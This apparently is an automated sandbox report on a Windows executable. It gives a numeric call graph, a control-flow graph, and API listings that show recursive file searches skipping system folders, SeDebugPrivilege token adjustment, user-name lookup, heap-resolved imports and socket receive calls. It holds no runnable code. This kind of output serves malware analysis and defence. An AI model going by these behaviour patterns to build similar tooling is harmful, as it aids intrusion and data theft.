8221->8207 8223 4031e5 4 API calls 8222->8223 8224 403fb1 VirtualFree 8223->8224 8224->8187 8226 4031e5 4 API calls 8225->8226 8227 40563a 8226->8227 8228 405872 8227->8228 8230 405881 8228->8230 8229 4058bc 8232 405797 4 API calls 8229->8232 8233 4058af 8229->8233 8230->8229 8289 4058d4 8230->8289 8232->8233 8233->8179 8235 405781 4 API calls 8235->8229 8237 405781 4 API calls 8236->8237 8238 405770 8237->8238 8238->8185 8240 4031e5 4 API calls 8239->8240 8241 403c52 CloseHandle 8240->8241 8241->8203 8243 403ca3 8242->8243 8246 403caa 8242->8246 8269 405dc5 8243->8269 8245 404056 6 API calls 8247 403cbe 8245->8247 8246->8245 8248 403d3a 8246->8248 8249 403d2e 8247->8249 8250 403d17 8247->8250 8251 403ccf 8247->8251 8248->8203 8265 403c59 8248->8265 8249->8248 8252 402bab 2 API calls 8249->8252 8253 405b6f 6 API calls 8250->8253 8254 405b6f 6 API calls 8251->8254 8252->8248 8255 403d14 8253->8255 8256 403cdd 8254->8256 8259 402bab 2 API calls 8255->8259 8257 405b6f 6 API calls 8256->8257 8258 403cee 8257->8258 8258->8255 8274 403d4d 8258->8274 8259->8249 8262 403d0b 8264 402bab 2 API calls 8262->8264 8264->8255 8266 403c21 8265->8266 8267 4031e5 4 API calls 8266->8267 8268 403c33 8267->8268 8268->8214 8268->8216 8283 406799 8269->8283 8271 405dd5 8272 402b7c 2 API calls 8271->8272 8273 405dfe 8272->8273 8273->8246 8286 403bb7 8274->8286 8276 403cfe 8276->8262 8277 403c62 8276->8277 8278 403d4d 5 API calls 8277->8278 8279 403c6d 8278->8279 8280 403c72 8279->8280 8281 4031e5 4 API calls 8279->8281 8280->8262 8282 403c87 CreateDirectoryW 8281->8282 8282->8262 8284 4031e5 4 API calls 8283->8284 8285 4067ad 8284->8285 8285->8271 8287 4031e5 4 API calls 8286->8287 8288 403bc9 GetFileAttributesW 8287->8288 8288->8276 8290 405797 4 API calls 8289->8290 8291 4058a8 8290->8291 8291->8233 8291->8235 8293 4031e5 4 API calls 8292->8293 8294 403baa 8293->8294 8294->8120 8294->8124 9731 40ebc6 9732 4040bb 12 API calls 9731->9732 9733 40ebdf 9732->9733 9738 40ecd7 9733->9738 9751 407795 9733->9751 9736 4056bf 2 API calls 9749 40ec12 9736->9749 9737 403f9e 5 API calls 9737->9738 9739 40ecb5 9740 402bab 2 API calls 9739->9740 9741 40ecbd 9740->9741 9742 413aca 4 API calls 9741->9742 9743 40ecc7 9742->9743 9745 405695 2 API calls 9743->9745 9744 407908 GetProcessHeap RtlAllocateHeap 9744->9749 9746 40eccd 9745->9746 9746->9737 9748 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 9748->9749 9749->9739 9749->9744 9749->9748 9750 402bab GetProcessHeap HeapFree 9749->9750 9762 412269 9749->9762 9750->9749 9752 4077ab 9751->9752 9758 4077b3 9752->9758 9769 405ae9 9752->9769 9754 4077e1 9755 407802 9754->9755 9756 4077f8 9754->9756 9754->9758 9759 402b7c 2 API calls 9755->9759 9757 402bab 2 API calls 9756->9757 9757->9758 9758->9736 9758->9746 9760 407811 9759->9760 9761 402bab 2 API calls 9760->9761 9761->9758 9785 40374e 9762->9785 9765 412299 9765->9749 9768 402bab 2 API calls 9768->9765 9770 405af7 9769->9770 9771 402b7c 2 API calls 9770->9771 9772 405b03 9771->9772 9778 405b5a 9772->9778 9782 405998 9772->9782 9774 405b21 9775 405b61 9774->9775 9777 402b7c 2 API calls 9774->9777 9776 402bab 2 API calls 9775->9776 9776->9778 9779 405b39 9777->9779 9778->9754 9779->9775 9780 405b40 9779->9780 9781 402bab 2 API calls 9780->9781 9781->9778 9783 4031e5 4 API calls 9782->9783 9784 4059ab 9783->9784 9784->9774 9786 402b7c 2 API calls 9785->9786 9787 40375f 9786->9787 9788 4031e5 4 API calls 9787->9788 9790 4037a3 9787->9790 9789 40378f 9788->9789 9789->9790 9791 402bab 2 API calls 9789->9791 9790->9765 9792 4037be 9790->9792 9791->9790 9793 4031e5 4 API calls 9792->9793 9794 4037e2 9793->9794 9795 40382b 9794->9795 9796 402b7c 2 API calls 9794->9796 9795->9768 9797 403802 9796->9797 9798 403832 9797->9798 9800 403809 9797->9800 9799 4036a3 4 API calls 9798->9799 9799->9795 9801 4036a3 4 API calls 9800->9801 9801->9795 8892 410cd1 8897 412093 8892->8897 8895 412093 20 API calls 8896 410cff 8895->8896 8900 4120a5 8897->8900 8918 410cf1 8897->8918 8898 4120b3 8899 404056 6 API calls 8898->8899 8901 4120ba 8899->8901 8900->8898 8904 412100 8900->8904 8902 405b6f 6 API calls 8901->8902 8903 412152 8901->8903 8901->8918 8905 412125 8902->8905 8919 403d74 8903->8919 8907 403fbf 7 API calls 8904->8907 8904->8918 8905->8903 8910 412139 8905->8910 8911 41214d 8905->8911 8907->8901 8909 41218c 8914 402bab 2 API calls 8909->8914 8909->8918 8913 402bab 2 API calls 8910->8913 8915 402bab 2 API calls 8911->8915 8912 402bab 2 API calls 8912->8909 8916 41213e 8913->8916 8914->8918 8915->8903 8917 402bab 2 API calls 8916->8917 8917->8918 8918->8895 8920 403d87 8919->8920 8921 403ea3 8920->8921 8923 405b6f 6 API calls 8920->8923 8922 405b6f 6 API calls 8921->8922 8925 403eb9 8922->8925 8924 403da3 8923->8924 8924->8921 8926 4031e5 4 API calls 8924->8926 8927 4031e5 4 API calls 8925->8927 8935 403f6f 8925->8935 8928 403dbc FindFirstFileW 8926->8928 8929 403ed3 FindFirstFileW 8927->8929 8932 403dd1 8928->8932 8943 403e9c 8928->8943 8934 403ee8 8929->8934 8949 403f8d 8929->8949 8930 402bab 2 API calls 8930->8935 8931 402bab 2 API calls 8931->8921 8933 4031e5 4 API calls 8932->8933 8941 405b6f 6 API calls 8932->8941 8948 403d74 15 API calls 8932->8948 8953 402bab 2 API calls 8932->8953 8954 403f63 8932->8954 8936 403e84 FindNextFileW 8933->8936 8938 4031e5 4 API calls 8934->8938 8940 405b6f 6 API calls 8934->8940 8945 403f75 8934->8945 8952 402bab 2 API calls 8934->8952 8962 40fa23 8934->8962 8935->8909 8935->8912 8936->8932 8937 403e96 8936->8937 8959 403bef 8937->8959 8942 403f50 FindNextFileW 8938->8942 8940->8934 8941->8932 8942->8934 8944 403f87 8942->8944 8943->8931 8946 403bef 5 API calls 8944->8946 8947 402bab 2 API calls 8945->8947 8946->8949 8950 403f7b 8947->8950 8948->8932 8949->8930 8951 403bef 5 API calls 8950->8951 8951->8935 8952->8934 8953->8932 8955 402bab 2 API calls 8954->8955 8956 403f69 8955->8956 8957 403bef 5 API calls 8956->8957 8957->8935 8960 4031e5 4 API calls 8959->8960 8961 403c01 FindClose 8960->8961 8961->8943 8963 40fa39 8962->8963 8964 410293 8963->8964 8965 405b6f 6 API calls 8963->8965 8964->8934 8966 40ffcc 8965->8966 8966->8964 8967 4040bb 12 API calls 8966->8967 8968 40ffeb 8967->8968 8969 41028c 8968->8969 8970 41027d 8968->8970 8972 402b7c 2 API calls 8968->8972 8971 402bab 2 API calls 8969->8971 8973 403f9e 5 API calls 8970->8973 8971->8964 8974 41001e 8972->8974 8973->8969 8974->8970 8975 40a423 4 API calls 8974->8975 8976 41004a 8975->8976 8977 4031e5 4 API calls 8976->8977 8978 41005c 8977->8978 8979 4031e5 4 API calls 8978->8979 8980 410079 8979->8980 8981 4031e5 4 API calls 8980->8981 8982 410096 8981->8982 8983 4031e5 4 API calls 8982->8983 8984 4100b0 8983->8984 8985 4031e5 4 API calls 8984->8985 8986 4100cd 8985->8986 8987 4031e5 4 API calls 8986->8987 8988 4100ea 8987->8988 9018 412516 8988->9018 8990 4100fd 8991 40642c 5 API calls 8990->8991 8992 41013e 8991->8992 8993 410142 8992->8993 8994 41019f 8992->8994 8995 40488c 5 API calls 8993->8995 8997 4031e5 4 API calls 8994->8997 8996 410151 8995->8996 8998 41019c 8996->8998 9000 404866 4 API calls 8996->9000 9010 4101bb 8997->9010 8999 41022a 8998->8999 9002 40642c 5 API calls 8998->9002 9006 413a58 13 API calls 8999->9006 9001 410163 9000->9001 9003 41018e 9001->9003 9005 406c4c 6 API calls 9001->9005 9004 410201 9002->9004 9007 403c40 5 API calls 9003->9007 9008 410205 9004->9008 9009 41022f 9004->9009 9011 410178 9005->9011 9012 41026e 9006->9012 9007->8998 9013 4126a7 7 API calls 9008->9013 9021 4125db 9009->9021 9015 4031e5 4 API calls 9010->9015 9016 406c4c 6 API calls 9011->9016 9017 402bab 2 API calls 9012->9017 9013->8999 9015->8998 9016->9003 9017->8970 9019 4031e5 4 API calls 9018->9019 9020 412539 9019->9020 9020->8990 9022 40488c 5 API calls 9021->9022 9023 4125ec 9022->9023 9024 41269f 9023->9024 9025 4031e5 4 API calls 9023->9025 9024->8999 9026 412609 9025->9026 9027 41268f 9026->9027 9028 4031e5 4 API calls 9026->9028 9029 403c40 5 API calls 9027->9029 9030 41262a 9028->9030 9029->9024 9036 412675 9030->9036 9038 4124f1 9030->9038 9031 4031e5 4 API calls 9031->9027 9034 4124f1 4 API calls 9037 412663 9034->9037 9035 4031e5 4 API calls 9035->9036 9036->9031 9037->9035 9039 4031e5 4 API calls 9038->9039 9040 412503 9039->9040 9040->9034 9040->9037 9227 4049dc 9228 4031e5 4 API calls 9227->9228 9229 4049ef 9228->9229 9884 40cddd 9885 405b6f 6 API calls 9884->9885 9886 40cdee 9885->9886 9887 40ce06 9886->9887 9888 413a58 13 API calls 9886->9888 9889 40ce59 9887->9889 9891 405b6f 6 API calls 9887->9891 9890 40ce00 9888->9890 9892 402bab 2 API calls 9890->9892 9893 40ce1c 9891->9893 9892->9887 9893->9889 9894 40ce52 9893->9894 9896 403d74 19 API calls 9893->9896 9895 402bab 2 API calls 9894->9895 9895->9889 9897 40ce45 9896->9897 9897->9894 9898 402bab 2 API calls 9897->9898 9898->9894 9230 40ecde 9231 412093 20 API calls 9230->9231 9232 40ecfd 9231->9232 9233 412093 20 API calls 9232->9233 9234 40ed0d 9233->9234 9238 40e8df 9239 412093 20 API calls 9238->9239 9240 40e8f8 9239->9240 9241 412093 20 API calls 9240->9241 9242 40e908 9241->9242 9249 404b22 9242->9249 9244 40e91c 9245 40e936 9244->9245 9248 40e93d 9244->9248 9256 40e944 9244->9256 9247 402bab 2 API calls 9245->9247 9247->9248 9250 402b7c 2 API calls 9249->9250 9252 404b33 9250->9252 9251 404b66 9251->9244 9252->9251 9265 4049b3 9252->9265 9255 402bab 2 API calls 9255->9251 9257 4056bf 2 API calls 9256->9257 9258 40e952 9257->9258 9259 40e976 9258->9259 9260 4057df 13 API calls 9258->9260 9259->9245 9261 40e966 9260->9261 9262 413aca 4 API calls 9261->9262 9263 40e970 9262->9263 9264 405695 2 API calls 9263->9264 9264->9259 9266 4031e5 4 API calls 9265->9266 9267 4049c6 9266->9267 9267->9251 9267->9255 9268 4139de 9277 413855 9268->9277 9270 4139f1 9271 413838 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 9270->9271 9272 4139f7 9271->9272 9273 413866 59 API calls 9272->9273 9274 413a2d 9273->9274 9275 413b81 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 9274->9275 9276 413a34 9275->9276 9278 4031e5 4 API calls 9277->9278 9279 413864 9278->9279 9279->9279 9904 4116e7 9905 4117ba 9904->9905 9906 405b6f 6 API calls 9905->9906 9911 4117f1 9905->9911 9907 4117d0 9906->9907 9908 404cbf 8 API calls 9907->9908 9907->9911 9909 4117eb 9908->9909 9910 402bab 2 API calls 9909->9910 9910->9911 9299 4094e7 9300 404b22 6 API calls 9299->9300 9301 4094fe 9300->9301 9302 409554 9301->9302 9303 405b6f 6 API calls 9301->9303 9304 409514 9303->9304 9306 404b22 6 API calls 9304->9306 9311 40954d 9304->9311 9305 402bab 2 API calls 9305->9302 9307 40952d 9306->9307 9309 409408 15 API calls 9307->9309 9313 409544 9307->9313 9308 402bab 2 API calls 9308->9311 9310 40953e 9309->9310 9312 402bab 2 API calls 9310->9312 9311->9305 9312->9313 9313->9308 9322 4058ea 9323 4031e5 4 API calls 9322->9323 9324 4058fd StrStrA 9323->9324 9956 40d4ea 9957 404bee 6 API calls 9956->9957 9958 40d500 9957->9958 9959 404bee 6 API calls 9958->9959 9964 40d5a0 9958->9964 9960 40d529 9959->9960 9961 404bee 6 API calls 9960->9961 9962 40d537 9961->9962 9963 404bee 6 API calls 9962->9963 9965 40d546 9963->9965 9965->9964 9966 405872 4 API calls 9965->9966 9967 40d56d 9966->9967 9968 405872 4 API calls 9967->9968 9969 40d57c 9968->9969 9970 405872 4 API calls 9969->9970 9971 40d58e 9970->9971 9972 405872 4 API calls 9971->9972 9972->9964 9973 40a3ea 9974 40374e 6 API calls 9973->9974 9975 40a403 9974->9975 9976 40a419 9975->9976 9977 4059d8 4 API calls 9975->9977 9978 40a411 9977->9978 9979 402bab 2 API calls 9978->9979 9979->9976 9362 404df3 WSAStartup 9366 4091f6 9367 404b22 6 API calls 9366->9367 9368 40920b 9367->9368 9369 409222 9368->9369 9370 409408 15 API calls 9368->9370 9371 40921c 9370->9371 9372 402bab 2 API calls 9371->9372 9372->9369 10006 4117fe 10007 404c4e 6 API calls 10006->10007 10008 411888 10007->10008 10009 404c4e 6 API calls 10008->10009 10012 411925 10008->10012 10010 4118ab 10009->10010 10010->10012 10025 4119b3 10010->10025 10013 4118c5 10014 4119b3 4 API calls 10013->10014 10015 4118d0 10014->10015 10015->10012 10016 4056bf 2 API calls 10015->10016 10017 4118fd 10016->10017 10018 405872 4 API calls 10017->10018 10019 41190a 10018->10019 10020 405872 4 API calls 10019->10020 10021 411915 10020->10021 10022 413aca 4 API calls 10021->10022 10023 41191f 10022->10023 10024 405695 2 API calls 10023->10024 10024->10012 10026 4119c6 10025->10026 10028 4119bf 10025->10028 10027 4031e5 4 API calls 10026->10027 10027->10028 10028->10013 9376 40e880 9377 41219c 14 API calls 9376->9377 9378 40e88e 9377->9378 9379 41219c 14 API calls 9378->9379 9380 40e89c 9379->9380 10092 40e48a 10093 404bee 6 API calls 10092->10093 10095 40e4d0 10093->10095 10094 40e4f4 10095->10094 10096 405872 4 API calls 10095->10096 10096->10094 9477 410390 9478 404b22 6 API calls 9477->9478 9479 4103a5 9478->9479 9480 410409 9479->9480 9481 405b6f 6 API calls 9479->9481 9486 4103ba 9481->9486 9482 410402 9483 402bab 2 API calls 9482->9483 9483->9480 9484 4103fb 9485 402bab 2 API calls 9484->9485 9485->9482 9486->9482 9486->9484 9487 403d74 19 API calls 9486->9487 9488 4103ee 9487->9488 9488->9484 9489 402bab 2 API calls 9488->9489 9489->9484 10107 40ed96 10108 4040bb 12 API calls 10107->10108 10120 40edb0 10108->10120 10109 40ef90 10110 40ef87 10111 403f9e 5 API calls 10110->10111 10111->10109 10112 412269 6 API calls 10112->10120 10113 405ae9 6 API calls 10113->10120 10114 40ef61 10115 40ef6e 10114->10115 10116 402bab 2 API calls 10114->10116 10117 40ef7c 10115->10117 10118 402bab 2 API calls 10115->10118 10116->10115 10117->10110 10119 402bab 2 API calls 10117->10119 10118->10117 10119->10110 10120->10109 10120->10110 10120->10112 10120->10113 10120->10114 10121 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 10120->10121 10122 402bab GetProcessHeap HeapFree 10120->10122 10121->10120 10122->10120 10123 40ef98 10124 404c4e 6 API calls 10123->10124 10125 40efb6 10124->10125 10137 40f02a 10125->10137 10138 40f054 10125->10138 10128 404bee 6 API calls 10129 40efda 10128->10129 10130 404bee 6 API calls 10129->10130 10131 40efe9 10130->10131 10132 405872 4 API calls 10131->10132 10131->10137 10133 40f008 10132->10133 10134 405872 4 API calls 10133->10134 10135 40f01a 10134->10135 10136 405872 4 API calls 10135->10136 10136->10137 10139 40f064 10138->10139 10140 402b7c 2 API calls 10139->10140 10142 40f072 10140->10142 10141 40efca 10141->10128 10142->10141 10144 405ecd 10142->10144 10145 4059b8 4 API calls 10144->10145 10146 405edf 10145->10146 10146->10142 9496 410c98 9497 41219c 14 API calls 9496->9497 9498 410ca8 9497->9498 9499 41219c 14 API calls 9498->9499 9500 410cb5 9499->9500 9501 412093 20 API calls 9500->9501 9502 410cc9 9501->9502 10216 41249c 10217 4056bf 2 API calls 10216->10217 10218 4124aa 10217->10218 10219 4057df 13 API calls 10218->10219 10224 4124ce 10218->10224 10220 4124be 10219->10220 10221 413aca 4 API calls 10220->10221 10222 4124c8 10221->10222 10223 405695 2 API calls 10222->10223 10223->10224 9506 40f49e 9507 40f4b6 13 API calls 9506->9507 9508 40f4a8 9507->9508 9509 40929e 9510 413b28 6 API calls 9509->9510 9511 4092a4 9510->9511 9512 405b6f 6 API calls 9511->9512 9513 4092af 9512->9513 9514 4092c5 9513->9514 9515 409408 15 API calls 9513->9515 9516 4092bf 9515->9516 9517 402bab 2 API calls 9516->9517 9517->9514 10243 407fa4 10244 407fb7 10243->10244 10245 402b7c 2 API calls 10244->10245 10247 407fee 10244->10247 10246 40800d 10245->10246 10246->10247 10248 4037be 4 API calls 10246->10248 10249 40803c 10248->10249 10250 402bab 2 API calls 10249->10250 10250->10247 9554 4090aa 9555 404b22 6 API calls 9554->9555 9556 4090c1 9555->9556 9557 4090d8 9556->9557 9558 409408 15 API calls 9556->9558 9559 404b22 6 API calls 9557->9559 9560 4090d2 9558->9560 9561 4090eb 9559->9561 9562 402bab 2 API calls 9560->9562 9563 409104 9561->9563 9564 408c4d 15 API calls 9561->9564 9562->9557 9565 4090fe 9564->9565 9566 402bab 2 API calls 9565->9566 9566->9563 9573 409cae 9588 404b79 9573->9588 9575 409cc5 9577 405b6f 6 API calls 9575->9577 9578 409d2f 9575->9578 9580 409d27 9575->9580 9576 402bab 2 API calls 9576->9578 9579 409cec 9577->9579 9579->9580 9581 404b79 6 API calls 9579->9581 9580->9576 9582 409d05 9581->9582 9583 409d1e 9582->9583 9584 408c4d 15 API calls 9582->9584 9585 402bab 2 API calls 9583->9585 9586 409d18 9584->9586 9585->9580 9587 402bab 2 API calls 9586->9587 9587->9583 9589 404b22 6 API calls 9588->9589 9590 404b8a 9589->9590 9590->9575 10310 411fb3 10311 405b6f 6 API calls 10310->10311 10313 412013 10311->10313 10312 412075 10313->10312 10314 41206a 10313->10314 10329 411a8d 10313->10329 10316 402bab 2 API calls 10314->10316 10316->10312 10318 4056bf 2 API calls 10319 41203d 10318->10319 10320 405872 4 API calls 10319->10320 10321 41204a 10320->10321 10322 413aca 4 API calls 10321->10322 10323 412054 10322->10323 10324 405695 2 API calls 10323->10324 10325 41205a 10324->10325 10326 413a58 13 API calls 10325->10326 10327 412064 10326->10327 10328 402bab 2 API calls 10327->10328 10328->10314 10330 402b7c 2 API calls 10329->10330 10331 411aa3 10330->10331 10349 411f05 10331->10349 10352 404ada 10331->10352 10334 404ada 4 API calls 10335 411cad 10334->10335 10336 411f0c 10335->10336 10337 411cc0 10335->10337 10338 402bab 2 API calls 10336->10338 10355 405eb6 10337->10355 10338->10349 10340 411d3c 10341 4031e5 4 API calls 10340->10341 10350 411d7b 10341->10350 10342 411ea6 10343 4031e5 4 API calls 10342->10343 10344 411eb5 10343->10344 10345 4031e5 4 API calls 10344->10345 10347 411ed6 10345->10347 10346 4031e5 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 10346->10350 10348 405eb6 4 API calls 10347->10348 10348->10349 10349->10314 10349->10318 10350->10342 10350->10346 10351 405eb6 4 API calls 10350->10351 10351->10350 10353 4031e5 4 API calls 10352->10353 10354 404afd 10353->10354 10354->10334 10356 405998 4 API calls 10355->10356 10357 405ec8 10356->10357 10357->10340 9620 40f6b8 9621 41219c 14 API calls 9620->9621 9622 40f6c7 9621->9622 9623 41219c 14 API calls 9622->9623 9624 40f6d5 9623->9624 9625 41219c 14 API calls 9624->9625 9626 40f6df 9625->9626 9645 40d6bd 9646 4056bf 2 API calls 9645->9646 9647 40d6c9 9646->9647 9658 404cbf 9647->9658 9650 404cbf 8 API calls 9651 40d6f4 9650->9651 9652 404cbf 8 API calls 9651->9652 9653 40d702 9652->9653 9654 413aca 4 API calls 9653->9654 9655 40d711 9654->9655 9656 405695 2 API calls 9655->9656 9657 40d71f 9656->9657 9659 402b7c 2 API calls 9658->9659 9660 404ccd 9659->9660 9661 404ddc 9660->9661 9662 404b8f 5 API calls 9660->9662 9661->9650 9663 404ce4 9662->9663 9664 404dd4 9663->9664 9665 402b7c 2 API calls 9663->9665 9666 402bab 2 API calls 9664->9666 9676 404d04 9665->9676 9666->9661 9667 404dcc 9668 404a39 5 API calls 9667->9668 9668->9664 9669 404dc6 9670 402bab 2 API calls 9669->9670 9670->9667 9671 402b7c 2 API calls 9671->9676 9672 404b8f 5 API calls 9672->9676 9673 402bab GetProcessHeap HeapFree 9673->9676 9674 404a39 5 API calls 9674->9676 9675 405b6f 6 API calls 9675->9676 9676->9667 9676->9669 9676->9671 9676->9672 9676->9673 9676->9674 9676->9675 9677 404cbf 8 API calls 9676->9677 9677->9676 9678 40f0bf 9679 4056bf 2 API calls 9678->9679 9680 40f0c9 9679->9680 9681 40f115 9680->9681 9682 404cbf 8 API calls 9680->9682 9683 41219c 14 API calls 9681->9683 9685 40f0ed 9682->9685 9684 40f128 9683->9684 9686 404cbf 8 API calls 9685->9686 9687 40f0fb 9686->9687 9688 413aca 4 API calls 9687->9688 9689 40f10a 9688->9689 9690 405695 2 API calls 9689->9690 9690->9681

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 141 403d74-403d90 call 4067c4 144 403d96-403da9 call 405b6f 141->144 145 403ea9-403ec0 call 405b6f 141->145 150 403ea6-403ea8 144->150 151 403daf-403dcb call 4031e5 FindFirstFileW 144->151 152 403f95 145->152 153 403ec6-403ee2 call 4031e5 FindFirstFileW 145->153 150->145 159 403dd1-403dd8 151->159 160 403e9d-403ea4 call 402bab 151->160 156 403f97-403f9d 152->156 161 403ee8-403ef8 call 405d24 153->161 162 403f8e-403f94 call 402bab 153->162 163 403e75-403e90 call 4031e5 FindNextFileW 159->163 164 403dde-403de2 159->164 160->150 176 403f03-403f0a 161->176 177 403efa-403f01 161->177 162->152 163->159 180 403e96-403e97 call 403bef 163->180 169 403e12-403e22 call 405d24 164->169 170 403de4-403df9 call 405eff 164->170 189 403e30-403e4c call 405b6f 169->189 190 403e24-403e2e 169->190 170->163 186 403dfb-403e10 call 405eff 170->186 182 403f12-403f2d call 405b6f 176->182 183 403f0c-403f10 176->183 177->176 181 403f41-403f5c call 4031e5 FindNextFileW 177->181 195 403e9c 180->195 198 403f87-403f88 call 403bef 181->198 199 403f5e-403f61 181->199 182->181 196 403f2f-403f33 182->196 183->181 183->182 186->163 186->169 189->163 203 403e4e-403e6f call 403d74 call 402bab 189->203 190->163 190->189 195->160 201 403f75-403f85 call 402bab call 403bef 196->201 202 403f35-403f36 call 40fa23 196->202 207 403f8d 198->207 199->161 201->156 209 403f39-403f40 call 402bab 202->209 203->163 217 403f63-403f73 call 402bab call 403bef 203->217 207->162 209->181 217->156
                                    APIs
                                    • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403DC4
                                    • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403E8C
                                    • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403EDB
                                    • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403F58
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2948416240.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2948398987.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000000.00000002.2948448472.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d81.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FileFind$FirstNext
                                    • String ID: %s\%s$%s\*$Program Files$Windows
                                    • API String ID: 1690352074-2009209621
                                    • Opcode ID: 37f6e0de98243db13940183a6d740f716220b5c39bd862cb24faecfac080353b
                                    • Instruction ID: acb13e71dd503001dda9649917d64d786dba47cd8022a2b45c5045a1a8a297e9
                                    • Opcode Fuzzy Hash: 37f6e0de98243db13940183a6d740f716220b5c39bd862cb24faecfac080353b
                                    • Instruction Fuzzy Hash: A651F3329006197AEB14AEB4DD8AFAB3B6CDB45719F10013BF404B51C1EA7CEF80865C
                                    APIs
                                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?,00000009,C6C3ECBB,00000000,00000000,?,00000000,?,?,?,?,?,0040F9DC), ref: 0040654E
                                    • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000,00000009,C1642DF2,00000000,00000000,00000000,?,00000000), ref: 00406589
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2948416240.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2948398987.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000000.00000002.2948448472.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d81.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AdjustLookupPrivilegePrivilegesTokenValue
                                    • String ID: SeDebugPrivilege
                                    • API String ID: 3615134276-2896544425
                                    • Opcode ID: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                                    • Instruction ID: 1578144bc241a5b33ff73db231d5495ab0f4fd5df9d31338026c5631bf24f4b3
                                    • Opcode Fuzzy Hash: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                                    • Instruction Fuzzy Hash: A1117331A00219BAD710EEA79D4AEAF7ABCDBCA704F10006EB504F6181EE759B018674
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                    • RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2948416240.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2948398987.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000000.00000002.2948448472.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d81.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateProcess
                                    • String ID:
                                    • API String ID: 1357844191-0
                                    • Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                                    • Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
                                    • Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                                    • Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9
                                    APIs
                                    • GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2948416240.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2948398987.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000000.00000002.2948448472.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d81.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: NameUser
                                    • String ID:
                                    • API String ID: 2645101109-0
                                    • Opcode ID: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
                                    • Instruction ID: cd86427636297e763c0a42ccb852711c5927781faf2e94d4e6bb5dc6023ef8f2
                                    • Opcode Fuzzy Hash: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
                                    • Instruction Fuzzy Hash: 93C04C711842087BFE116ED1DC06F483E199B45B59F104011B71C2C0D1D9F3A6516559
                                    APIs
                                    • recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2
                                    Memory Dump Source
